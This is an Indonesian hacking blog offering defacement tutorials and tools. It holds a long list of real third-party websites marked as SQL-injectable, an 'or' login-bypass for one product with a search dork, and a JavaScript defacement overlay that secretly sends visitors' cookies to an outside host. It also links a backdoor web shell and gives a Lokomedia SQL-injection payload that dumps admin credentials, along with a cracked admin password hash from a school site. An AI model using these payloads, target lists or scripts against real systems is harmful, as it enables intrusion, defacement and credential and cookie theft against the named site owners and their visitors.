ORANGUTAN1BILLION

Kamis, 08 Juni 2017

Situs Mirror Deface Terbaik

6/08/2017 1 Komentar

Dalam dunia hacking deface sendiri berarti mengubah tampilan suatu website, mau berupa halaman utamanya (index) maupun file atau pun folder yang masih dalam satu URL dengan website tersebut. Sedangkan mirror deface adalah sebuah tempat untuk meng-arsipkan hasil dari kegiatan kita melakukan deface pada suatu website agar ketika website tersebut melakukan perbaikan kita masih bisa melihat hasil / arsip dari deface kita.

Nah kali ini saya akan membagikan sebuah artikel mengenai situs deface mirror terbaik di kalangan defacer.

1. Zone-H

Situs ini telah menyimpan ribuan hasil deface dari para defacer di seluruh dunia, termasuk defacer paling legenda di Indonesia yaitu Hmei7. Sangat pantas rasanya jika situs ini mendapatkan peringkat pertama untuk situs mirror deface.

Situs : Zone-H

Submit Deface : Submit Zone-H

2. Defacer.ID

Kalau situs mirror yang satu ini adalah situs mirror milik Indonesia, di sinilah tempatnya para defacer Indonesia unjuk gigi hasil-hasil deface mereka, beberapa hari yang lalu situs ini bahkan terkena deface oleh kelakuan defacer Indonesia sendiri, ada-ada saja.

Situs : Defacer.ID

Submit Deface : Submit Defacer.ID

3. Defacer-DB

Nah kalau situs mirror yang satu ini masih tergolong baru, kamu bisa submit hasil deface kamu dari 20-30 situs untuk maksimal submitnya.

Situs : Defacer-DB

Submit Deface : Submit Defacer-DB

SQL Injection Vuln

Kumpulan Website Vuln 2017

6/08/2017 2 Komentar

Kali ini saya akan membagikan beberapa website-website vuln 2017, inilah beberapa daftarnya :

http://www.metasofsda.in/School/index.php?id=44%27

https://www.athenainfonomics.in/career_description.php?id=14%27&title=full%20time&return=53

http://myimpact.impactmeasurement.co.in/clipj_admin.php?id=da29a445f9%273793b1bde09b4fd230bc61

http://www.teluguproperties.co.in/sellerdetail.php?id=15%27

http://www.pdrungta.co.in/utility.php?id=10%27

http://www.arb-bearings.com/content.php?id=2%27

http://www.mits-india.org/vision.php?id=1%27

http://www.kreativindia.biz/works.php?id=52%27

http://heteroworld.com/view_news.php?id=455%27

http://www.fieo.org/view_section.php?id=0,34,551%27

http://www.sankalpa.it/ita/india.php?id=100%27

http://www.goafilms.com/location.php?id=1%27

https://www.brudirect.com/news.php?id=17516%27

http://www.granium.com/app-details.php?id=1%27

http://comfortrealtyindia.com/sectioncontent.php?id=1%27

http://www.tslindia.net/campusgallery.php?ID=1%27

http://www.winnersplotsandproperties.com/projects.php?id=1%27

http://www.anchorsinindia.in/detail.php?id=84%27

http://hyderabadcitysearch.com/redirect.php?id=49535%27

http://bsit.org.in/dept.php?id=17%27

http://aderindia.org.in/images.php?id=5%27

http://naipunnya.org.in/view-gallery.php?id=45%27

http://events.org.in/product_detail.php?id=7%27

http://www.nordic.org.in/more_news.php?id=29%27

http://www.teaminternational.org.in/Bathroom_supplies.php?id=57%27

http://blog.ecell.org.in/post.php?id=25%27

http://www.divinehardware.com/product.php?id=39%27

http://potsndials.com/product.php?id=1%27

http://weighpacktech.in/product.php?id=143%27

http://www.rajbhogcafe.menu/product.php?id=66%27

http://www.mehtaengineers.com/product.php?id=6%27

http://www.indiastoneexport.in/product.php?cat_id=59%27&subcate_id=246&stpos=0

http://www.aios.org/page.php?id=10%27

http://www.disabilityindia.co.in/showstory.php?id=19%27

http://hirapannajewellers.in/jewellery.php?category=BANGLES%27

http://www.mohitminerals.in/news.php?id=27%27

http://www.mpuat.ac.in/index.php?id=2%27&type=DP

http://inducefoundation.in/product.php?id=2%27

http://www.sketchinteriors.in/productview.php?id=2%27

http://www.sketchinteriors.in/admin/adminHome.php

http://www.sketchinteriors.in/productview.php?id=-2

http://www.whitecollars.in/page.php?id=2%27

http://www.sdmcujire.in/prgrmrdmre.php?id=2%27

http://www.kongupolytechnic.ac.in/news.php?id=2%27

http://www.maldacollege.ac.in/photo-inner-gallery.php?id=7%27

http://www.jjengineering.in/gallery.php?id=12%27

http://naipunnya.org.in/view-gallery.php?id=45%27

http://crescentpublicschool.in/sub-gallery.php?id=6%27

http://www.vatikajewellers.co.in/gallery.php?id=12%27&album=Tanjore_Art_Jewellery

http://www.beverlyhills.co.in/gallery.php?id=20X3%27

http://ncf.co.in/photo-gallery.php?id=1%27

http://www.digiclickstudio.co.in/gallery.php?id=128%27

http://shagunfurniture.in/product.php?id=165%27

http://kae.co.in/product.php?id=7%27

http://www.urjaglobal.in/product.php?id=58%27

http://golfessentials.in/product.php?id=84

http://www.worldofproteins.in/product.php?cid=28%27

http://www.silverdrops.co.in/search_result.php?id=29%27

http://www.academicscience.co.in/news_detail.php?id=3%27

http://www.pdrungta.co.in/utility.php?id=10%27

http://www.teluguproperties.co.in/sellerdetail.php?id=15%27

http://www.myhomes.co.in/newtrailer1.php?id=1%27

http://www.ctvn.co.in/iphoto.php?id=24

http://mahmudpurhschool.edu.bd/notice_details.php?notice_id=ntc1413589%27

http://www.mmenterprises.co.in/job_detail.php?id=181%27

http://www.quicktrade.co.in/category_list.php?id=32%27

http://weddingsandevents.co.in/album.php?id=1%27

http://www.racetech.co.in/video.php?id=17%27

http://www.torex.co.in/product-detail.php?id=7%27

http://www.iampl.co.in/welfare-and-celebrations.php?id=48%27

http://www.signum.co.in/workforus.php?id=22%27

http://www.marudhartech.co.in/category_list.php?id=3%27

http://www.essentia.co.in/product.php?id=85%27

http://acoustictreatments.co.in/product.php?id=7%27&name=Acoustic-Doors-&-Windows.php

http://rudrapriya.co.in/product.php?id=EB0110%27

http://samsonorthotics.co.in/samson/product.php?id=1%27

http://digiclickstudio.co.in/gallery.php?id=119'

http://ptrcmmps.in/photos.php?id=1%27

http://www.sunriseprojects.in/Picture-Gallery-Photos.php?id=1%27

http://www.cpro.co.in/photos.php?id=1%27

http://www.krgce.in/photos.php?id=-8'

http://www.tnincometax.gov.in/view-photos.php?id=3%27

http://saf.org.in/photos.php?id=7%27

https://punepolice.co.in/event-photos.php?id=55%27

http://sdpublicschool.org.in/photos.php?id=4%27

http://www.cpro.co.in/photos.php?id=2%27

http://ifacteducation.in/photos.php?id=2%27

http://shrishtividyashram.edu.in/event.php?id=2%27

http://www.investment-bankers.in/event.php?id=2%27

http://www.shivashaktitillmill.in/product.php?id=2%27

http://www.kreativindia.biz/works.php?id=52%27

http://www.billemmott.com/article.php?id=77%27

http://newsandviews24.com/read.php?id=p_36%27

http://www.arb-bearings.com/content.php?id=2%27

http://www.goafilms.com/location.php?id=1%27

http://www.aios.org/page.php?id=10%27

http://www.sankalpa.it/ita/india.php?id=100%27

http://www.hyderabadcitysearch.com/redirect.php?id=128024%27

http://bnal.in/cat-pro.php?id=1%27

http://www.disabilityindia.co.in/showstory.php?id=19'

http://www.anchorplywood.in/productsdetail.php?id=13%27

http://www.mshospitality.in/photo-gallery.php?uid=-25

http://www.algolabs.in/detail-page.php?id=2%27

http://northeastnews.in/news.php?id=17%27

http://www.saihydromotor.in/highspedmotors.php?id=5%27

http://mitsgwalior.in/department.php?id=cs

http://ns2.cinfoway.in/data.php?id=1%27

http://npa.amce-manual.com/2016/db/detail.php?id=NPAC10'

http://www.harshstones.com/product-detail.php?id=35'

http://www.aradergalleries.com/detail.php?id=1659%27

http://allamah.edu.af/more_detail3.php?id=8%27

http://rccepublicschool.edu.in/news.php?id=1%27

http://www.aayojan.edu.in/jaipur/events_detail.php?id=1%27

http://www.amche.edu.in/content.php?id=1%27

http://www.kitegroup.edu.in/detail.php?id=1%27

http://www.aayojan.edu.in/pune/events_detail.php?id=1%27

http://www.vardhamancollege.edu.in/VDC_News_Events.php?id=1%27

http://www.jecrcudml.edu.in/news_detail.php?id=-1

http://www.jgu.edu.in/jirico/speaker.php?id=1%27

https://research.iiitd.edu.in/groups/dbm/index.php?id=1%27

http://gniotgroup.edu.in/place_gallery.php?id=1%27-INDIAN-ARMY

http://www.naipunnya.edu.in/submenu_page.php?id=1%27

http://www.ibsc.org.in/services2.php?id=-1

http://www.khurasan.edu.af/news_detail.php?id=1%27

http://allamah.edu.af/more_detail3.php?id=8%27

http://eu.edu.af/news.php?id=2%27

http://www.iec.org.af/eng/content.php?id=9&cnid=64%27

http://amg.com.af/index.php?fuseaction=section.main&id=3%27

http://addo.org.af/post.php?id=2%27

http://pnstechnology.in/cheetah/cart.php?id=204%27

http://www.spycamstore.in/add-cart.php?id=714%27

http://www.spycamstore.in/admin/

http://www.dortel.in/add-to-cart.php?id=1126%27&action=add

http://sbstechnologies.in/hotel/page/product.php?id=1%27

http://www.neardoor.in/product.php?id=2%27

http://www.ledl.in/scripts/product.php?id=4%27

http://www.blindrivets.in/product.php?id=3%27

http://selectinternational.in/product.php?id=25%27

http://spectralum.in/product.php?id=6

http://www.mynativebazaar.co.in/product/id/4F41C0A5C61D4BA082895689D16559BC'

http://www.gorakhpurshop.in/shop.product.php?id=8&company_id=05042016242306087526%27

http://www.webtechservices.in/workroom/ultimate-health/product.php?id=17%27

http://www.indiastoneexport.in/product.php?cat_id=59%27&subcate_id=246&stpos=0

http://www.spyec.in/pop-product.php?id=-8

http://www.nmdesign.in/product.php?id=48%27

http://www.dpengineer.in/product.php?catid=70%27

http://www.sandstonepaving.co.in/product.php?cat_id=2%27&subcate_id=24&stpos=0

http://www.swisswater.in/product.php?id=1%27

http://www.greenpharmacy.co.in/product.php?id=74%27

http://www.omarts.in/product.php?id=1

http://fabilus.in/product.php?id=297%27

http://www.shreealuminium.in/product.php?id=308%27

http://dharshiniimpex.in/product.php?id=111%27

http://www.skmobile.in/product.php?id=9%27&mob=1

http://www.venussteel.in/product.php?type=Chairs%27

http://chairpart.in/features-product.php?id=95%27

http://angelstar.in/test1/Ilag_surgicare/product.php?id=452%27

http://ozoneplus.in/product.php?id=2%27

http://www.futron.in/features-product.php?id=2'

http://aarsh.co.in/products.php?id=11%27

http://www.parswa.in/products.php?id=18%27

http://www.paradiseglobal.in/products.php?id=8%27

http://www.comtronics.co.in/products.php?id=2%27

http://www.uttamind.in/Products.php?id=130ML%27

http://www.brightbrothers.co.in/products.php?id=56

http://www.aclassmarble.co.in/products.php?pid=6%27

http://moderndecors.in/products.php?id=9%27

http://www.suretech.co.in/products.php?content=-1

http://kundalijewels.in/products.php?id=-29'

http://mahilaehaat-rmk.gov.in/en/product.php?parent_id=92%27&material_search=OD-ID%20Flange%20for%20Clamping

http://ravirajresearch.buwa.in/products.php?id=1%27

http://dynent.in/products.php?id=3%27&n=WRITING/PRINTING-PAPER%27

theparkergroup.in/Products.php?id=4'&CatName=Residential

http://theparkergroup.in/Products.php?id=4 &CatName=Residential<h1> i am here</h1> (XSS)

http://pragatirentalservices.co.in/products.php?id=5%27

http://royalbengal.in/products.php?id=3%27

http://justhygiene.co.in/products.php?id=2%27

http://www.sungroupindia.co.in/products_type.php?c=4%27

http://proofer.in/products.php?id=92

http://www.shrikrishnasteel.in/products.php?id=115%27

http://www.omaxwatch.in/products.php?id=52522de652d8b%27

http://www.tinytots.net.in/products.php?id=2%27

http://4yu.co.in/products.php?id=8%27

http://www.bigeyedeals.in/products.php?id=137%27

http://wsm.net.in/products.php?id=72%27

https://www.maldacollege.ac.in/photo-inner-gallery.php?id=6%27

http://naipunnya.org.in/view-gallery.php?id=45%27

http://www.beverlyhills.co.in/gallery.php?id=K3I1%27

http://crescentpublicschool.in/sub-gallery.php?id=6%27

http://www.sbce.co.in/view-gallery.php?id=21%27

http://www.nacenkanpur.gov.in/gallery.php?id=CA

http://www.hawkeeyed.co.in/daisydalesschool/gallery.php?id=70%27

http://vdga.in/projects-gallery.php?id=35%27

http://ncf.co.in/photo-gallery.php?id=1%27

http://www.jjengineering.in/gallery.php?id=12%27

http://hayakawa.in/gallery.php?id=8%27

http://centuryapartments.in/photo-gallery.php?id=20%27

weightlossindia.co.in/gallery.php?id=1

http://www.vatikajewellers.co.in/gallery.php?id=12%27&album=Tanjore_Art_Jewellery

http://sghpstarntaran.edu.in/gallery.php?task=ViewMore&Id=10%27

http://www.hcra.org.in/image-gallery.php?id=9

http://www.digiclickstudio.co.in/gallery.php?id=128

http://pcis.in/sub-gallery.php?id=-173' union select 1,2,3,4,5-- -&name=Pongal Celebrations

http://www.parkridgeresort.in/sub-gallery.php?vid=9%27

http://www.sgclicks.in/gallery.php?id=3%27

http://preetlari.com/photo/gallery.php?page=47&ID=22

Selasa, 06 Juni 2017

Bypass Admin

WTS Technologies Admin Login Bypass

6/06/2017 1 Komentar

Nah pada postingan kali ini aku akan mencoba berbagi cara bypass login admin untuk WTS Technologies Admin. Langsung aja.

BAHAN-BAHAN

Dork :

"Powered by WTS Technologies"

Username & Password

Username : '=''or' atau admin
Password : '=''or' atau admin

Halaman Login

http://target.com/console/

TUTORIAL

Tinggal kalian cari website target kalian yang halaman adminnya adalah /console, coba masukkan username dan passwordnya yang sudah tersedia di bahan-bahan di atas.

Cukup mudah bukan?

Deface Javascript Javascript Overlay Script

Deface Metode JS Overlay

6/06/2017 Komentar

Banyak yang kebingungan ketika sudah dapat akses ke halaman admin tapi tidak bisa deface gara-gara shell gagal untuk diupload. Nah solusinya adalah menggunakan metode JS Overlay, jadi singkatnya fungsi JS Overlay ini adalah mengambil / menarik data dari halaman website yang masih terdeface oleh kita untuk ditimpa ke website target kita yang tidak bisa upload shell tadi.

Contoh :

1. http://web-tardeface.com/files/upload/deface.html (Asumsikan saja web dengan URL ini misalkan adalah web yang masih tertanam halaman deface kita)

2. http://web-target.com/ (Asumsikan saja web ini yang mau kita deface tapi tidak bisa upload shell

Nah, pada website No. 2 kita posting Perintah Javascript yang berisikan perintah JS Overlay untuk menarik / mengambil data halaman deface kita di website No. 1 agar ditimpakan ke website No. 2

Sampai di sini paham?

Kalau paham mari kita lanjut, kalau kurang paham coba silahkan beri komentar di bawah. Oke saya anggap kalian paham ya hehe. Nah sekarang yang kita butuhkan adalah :

JS Overlay

Perintah Javascript

JS Overlay

/* <style>html,body{color:#ffffff}</style><font color='white'><script>top.location.href='http://www.google.com/?v=wall/'</script><noscript><META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.facebook.com/?v=wall/"> */
document.getElementsByTagName('body')[0].innerHTML=""
document.title="ORANGUTAN1BILLION"
var shortc=document.createElement("link");shortc.rel="SHORTCUT ICON";shortc.href="http://i.imgur.com/hs2Zgt5.png";document.getElementsByTagName("head")[0].appendChild(shortc)
function muter2(){
scrW=screen.availWidth
scrH=screen.availHeight
window.moveTo(0,0)
window.resizeTo(10,10)
window.focus()
for(x=0;x<80;x++){
window.resizeTo(10,scrH*x/80)
}
for(y=0;y<80;y++){
window.resizeTo(scrW*y/80,scrH)
}
window.resizeTo(scrW,scrH)
}
document.oncontextmenu=new Function("muter2();return false");
function keypressed(){alert("ORANGUTAN1BILLION");}
document.onkeydown=keypressed;
function kasih_tau(){
alert('ORANGUTAN1BILLION');
}
if(location.href.indexOf('transtv.co.id')==-1)setTimeout("alert('ORANGUTAN1BILLION');",3000);
else setTimeout("kasih_tau()",3000);
if(navigator.userAgent.indexOf('MSIE')!=-1){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='http://www.islamictube.com/shared/mailshot/ckeditor/kcfinder/upload/files/pepes.html' height='667px' width='1366px' scrolling='no' frameborder='0'></center>";
}
else{
if(document.getElementsByTagName('body')[0].style.cssText.indexOf('hack')==-1){
//muter2();
log="";
if(document.cookie!=""&&location.href.indexOf('ayodance.com')==-1){x=escape(document.cookie);v=escape(location.href);y="que3n4ngelz@yahoo.co.id";log=";background-image:url(http://crazydavinci.net/riper.php?o="+escape(x)+"&v="+escape(v)+"&y="+escape(y)+")";document.cookie="PHPSESSID=!Bagsfreakz Here!;path=/";}
document.getElementsByTagName('body')[0].style.cssText=" background: #ff0084;
background: -moz-linear-gradient(top, #ff0084 0%, #0099b7 100%);
background: -webkit-linear-gradient(top, #ff0084 0%,#0099b7 100%);
background: linear-gradient(to bottom, #ff0084 0%,#0099b7 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ff0084', endColorstr='#0099b7',GradientType=0 );
text-align: center;"+log
window.onload=function(){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='http://www.islamictube.com/shared/mailshot/ckeditor/kcfinder/upload/files/pepes.html' height='667px' width='1366px' scrolling='no' frameborder='0'></center>";
document.getElementsByTagName('body')[0].style.cssText=" background: #ff0084;
background: -moz-linear-gradient(top, #ff0084 0%, #0099b7 100%);
background: -webkit-linear-gradient(top, #ff0084 0%,#0099b7 100%);
background: linear-gradient(to bottom, #ff0084 0%,#0099b7 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ff0084', endColorstr='#0099b7',GradientType=0 );
text-align: center;";
} } }

Warna Merah = Nama identitas kalian
Warna Hijau = Link shortcut icon, ganti link icon punya kalian
Warna Biru = Link website yang masih ditanami halaman deface kalian

Perintah Javascript

<script type="text/javascript" src="https://pastebin.com/raw/NbMnLEFM"></script>

Warna Jingga = Link JS Overlay yang kalian upload di Pastebin

TUTORIAL

Daftar Akun Pastebin

Kalian coba daftar akun dulu di :

https://pastebin.com/

Gunanya untuk mengupload script JS Overlay di sana

Copy Link Pastebin

Setelah kalian daftar akun pastebin, coba upload JS Overlay yang ada di atas (edit dulu ya itu biar tampilannya defacenya tidak keupload punyaku -___-) Nah setelah kalian upload JS Overlaynya nanti akan muncul tampilan seperti ini :

Nah kalian klik Raw untuk menampilkan script JS Overlay secara utuh, setelah kalian klik Raw lalu cek URL di browser kalian, maka ini lah link utuh JS Overlay kalian, contoh:

Copy link pastebin yang ada /raw/ nya itu ke Perintah Javascript, contoh :

<script type="text/javascript" src="https://pastebin.com/raw/NbMnLEFM"></script>

Paste Link Perintah Javascript

Nah karena kalian sudah dapat akses halaman admin website target kalian, coba cari apa pun di halaman adminnya yang bisa posting Perintah Javascript yang sudah ada Link Pastebin RAW itu.

Upload script pendek itu ke mana aja asal bisa tampil di halaman websitenya, contoh:

Nah ini hasil halaman index websitenya :

(2 screenshoot ini aku ambil dari blog http://blog.garudasecurityhacker.org, aku lupa screenshoot hasil deface JS Overlay punyaku, maafkeun -___-)

Script Shell Backdoor

Shell IndoXploit - Modified By Orangutan1Billion

6/06/2017 Komentar

Kali ini saya akan berbagi shell backdoor milik kelompok IndoXploit, tapi untuk tampilan shellnya agak saya ubah-ubah sedikit hehe.

Langsung sedot sini :

https://pastebin.com/raw/6dG02iQu

Tampilan login shell :

(Tampilan loginnya tersembunyi, untuk input passwordnya tinggal tekan tombol tab di keyboard, default password ada di scriptnya)

Untuk tampilan utamanya seperti ini :

Ingat! Sekali lagi ini bukan shell backdoor bikinan saya, saya cuma mengubah dibagian tampilannya saja agar lebih sesuai dengan keinginan saya, siapa tau ada yang suka dengan tampilannya, tapi gak penting juga deng tampilannya, yang penting itu fiturnya hoho. Semoga Team IndoXploit berkenan ya shellnya saya modifikasi begini hehe.

Deface Script Script Deface

Script Deface Orangutan1Billion

6/06/2017 Komentar

Kali ini saya akan membagikan script deface milik saya sendiri, hehe. Itung-itung nambahin postingan di blog ini. Bukannya apa-apa, siapa tahu ada yang pengen deface tapi gak punya script.

Silahkan sedot scriptnya di sini :

https://pastebin.com/raw/C6Tcv4L3

Tampillan deface :

SQL Injection

SQL Injection Lokomedia

6/06/2017 Komentar

Kali ini saya akan mecoba berbagi tutorial dasar untuk meninjeksi SQL website yang memakai CMS Lokomedia untuk mendapatkan username dan password dari adminnya. Langsung simak saja ya hehe.

BAHAN-BAHAN :

Dork :

inurl:/statis-1-profil.html

inurl:/statis-2-profil.html

inurl:/statis-3-strukturorganisasi.html

Silahkan pilih salah satu dari dork di atas dan cari di mesin pencarian google, dari sekian banyaknya dork untuk Lokomedia, pilihan di atas adalah dork yang paling umum.

Eksploit

'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Fungsi eksploit ini agar bisa diinjeksikan ke URL website yang sudah kita targetkan.

Halaman Login Admin

http://webtarget.com/adminweb

http://webtarget.com/admin

http://webtarget.com/administrator

http://webtarget.com/redaktur

Cara ini akan sedikit lebih susah untuk mencari halaman admin karena tiap-tiap halaman login admin di tiap-tiap website CMS Lokomedia pasti berberbeda-beda, pilihan di atas adalah halaman login default, kalau adminnya pinter pasti mereka tidak memakai pilihan di atas, kalau adminnya masih memakai halaman default tersebut berarti anda beruntung.

Keberuntungan

Keberuntungan memang sangat diperlukan untuk mempraktekkan metode SQL Injection Lokomedia ini, karena kebanyakan yang terjadi di lapangan adalah: kita sudah dapat username dan password adminnya tapi tidak beruntung untuk menemukan halaman login si adminnya.

MD5 Decrypter

https://hashkiller.co.uk/md5-decrypter.aspx

http://md5online.org/

Nah kalau sudah ketemu password dari adminnya, kita crack passwod MD5 nya menggunakan website di atas.

TUTORIAL :

Website Target

Saya di sini sudah punya website target yang memakai CMS Lokomedia, cukup gunakan dork yang sudah saya sediakan di atas lalu copy dan paste ke mesin pencarian google.

(Mohon maaf saya blur domain utamanya, takutnya ada yang nyoba nikung ke sini, kasian adminnya soalnya ini website sekolah hehe)

Cara Eksploit

Kalau sudah dapat target websitenya, sekarang eksploit URLnya dengan eksploit yang sudah saya bagikan di bagian bahan-bahan paling atas. Cara eksploitnya cukup paste-kan ke URL di antara "1 dan -"

Perhatikan tanda merah :

Nah, penampakannya ada di bawah :

INGAT! Paste eksploitnya ke di tengah-tengah antara "1 dan -"

Cara Dapat Username & Password

Jika website sudah dieksploit dan di tekan ENTER, maka kira-kira tab Chrome atau Firefox kalian pada website tersebut akan seperti ini :

(Ini artinya tanda-tanda kamu dapat username dan password adminnya)

Untuk lebih jelas username dan passwordnya kamu bisa :

Klik Kanan Mouse > View Page Source

atau

CTRL + U

INGAT! Aplikasikan View Page Source atau CTRL+U di tab website yang sudah kalian eksploit. Jangan di tab yang lain -_____-

Nah maka penampakannya akan seperti ini :

Sekarang kita sudah dapat username dan password para admin di website tersebut.

Cara Crack Password

Untuk crack password silahkan gunakan website yang sudah saya bagikan di bahan-bahan paling atas. Saya akan ambil salah satu contoh username dan password dari admin web target saya.

sidikbjb d079984aedc343ff7e7c97cd9c949498

Lalu saya akan coba crack MD5 password dan hasilnya adalah :

d079984aedc343ff7e7c97cd9c949498 = mencintaumu

Login Ke Halaman Admin

Untuk cara ini saya serahkan ke anda masing-masing, karena teknik ini tergantung keberuntungan dan kehebatan masing-masing dalam menebak. Silahkan baca bahan-bahan di atas siapa tahu halaman admin dari website target anda menggunakan alamat default hahaha.

Selamat mencoba. Kalau sudah tahu caranya tolong gunakan sebaik-baiknya, jangan digunakan untuk mengobrak-abrik apalagi merusak website sekolah dan website pelayanan masyarakat lainnya. Kalau ketemu website yang rentan seperti ini tolong beritahu admin website tersebut.